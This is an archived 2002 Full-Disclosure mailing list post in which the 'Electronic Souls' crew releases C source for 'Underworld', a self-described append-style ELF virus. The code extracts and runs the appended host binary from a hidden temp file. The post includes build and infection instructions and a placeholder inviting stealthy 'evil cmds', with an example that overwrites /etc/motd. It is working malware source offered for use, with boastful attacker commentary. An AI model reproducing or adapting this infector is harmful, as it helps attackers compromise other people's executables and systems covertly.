|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
es_at_hush.com
Date: Fri Nov 29 2002 - 20:14:12 CST
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
As the title of this email suggests, no members of our crew are owned.
Please enjoy the code.
# cat 4553underworld.c
/*
-----------------------------------------------------------
[CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
------------------- DO NOT DISTRIBUTE ! -------------------
-----------------------------------------------------------
[Underworld] - append ELF infect0r
(C) BrainStorm - 01-2002
-----------------------------------------------------------
Information :
+++++++++++++
This ELF Infector uses the appendage infection tekneeq!
that means to two Executeables are appended together.
It worx like that :
_________________
| | The Parasite Code is first, thats why
| [PARASITE CODE] | it needs to know its own size.
|_________________|
| | the host code stays untouched and gets
| [ORIGINAL CODE] | extracted and executed from the virus.
|_________________|
-----------------------------------------------------------
to get it working :
+++++++++++++++++++
'gcc code.c -O2 -o code', then get the file size and change
the define in the code, now recompile and we are done ;)
-----------------------------------------------------------
to infect a binary :
++++++++++++++++++++
cat /bin/binary >> underworld
you get the point ...
-----------------------------------------------------------
special thanks to :
+++++++++++++++++++
ghQst and SectorX for making me interested in ELF infection
and for beeing there for me since back in the days =) !
shouts go out to all ElectronicSouls members - j00 r0ck =)
-----------------------------------------------------------
[ElectronicSouls] - keep the spirit alive !
-----------------------------------------------------------
*/
/*
KUNG FOO !
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PARASIZE 14985 /* dont forget to change me ! */
#define TEMP ".para.tmp" /* tmp file */
#define KILL(X) exit(1) /* what could this be ? */
int main(int argc, char *argv[], char *envp[])
{
int input,
output,
lenght;
char *dope;
struct stat stat;
printf("\n\n Welcome on the other side ;> \n 0x45 0x53 ! ph34r our krad tekneeqz !
# \n");
/*
[insert evil cmds here!]
be sure to hide the output of external programs
to be more stealth .. heh
example:
system("echo "did you know? i 0wn j00!" > /etc/motd");
you get the point ;)
*/
input = open("/proc/self/exe", O_RDONLY);
if (input < 0)
KILL("open(input)");
if (fstat(input, &stat) < 0)
KILL("fstat");
lenght = stat.st_size - PARASIZE;
dope = malloc(lenght);
if (dope == NULL)
KILL("malloc");
if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE)
KILL("lseek(input)");
if (read(input, dope, lenght) != lenght)
KILL("read(input)");
close(input);
output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);
if (output < 0)
KILL("open(output)");
if (write(output, dope, lenght) != lenght)
KILL("write(output)");
free(dope);
close(output);
exit(execve(TEMP, argv, envp));
}
/* quick and dirty, small but effective !# */
/* im new into this so send flames to /dev/null wh0r3z ..show better code 1st ;) */
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"So Tired, We Have Insomnia"
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3oHwkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt9aYAoLF/hFJ55U7r
bAa57+3t/dUOt/iJAJ4kFQNfEdrP900U3IfMU1ZwssnAgw==
=BZRe
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]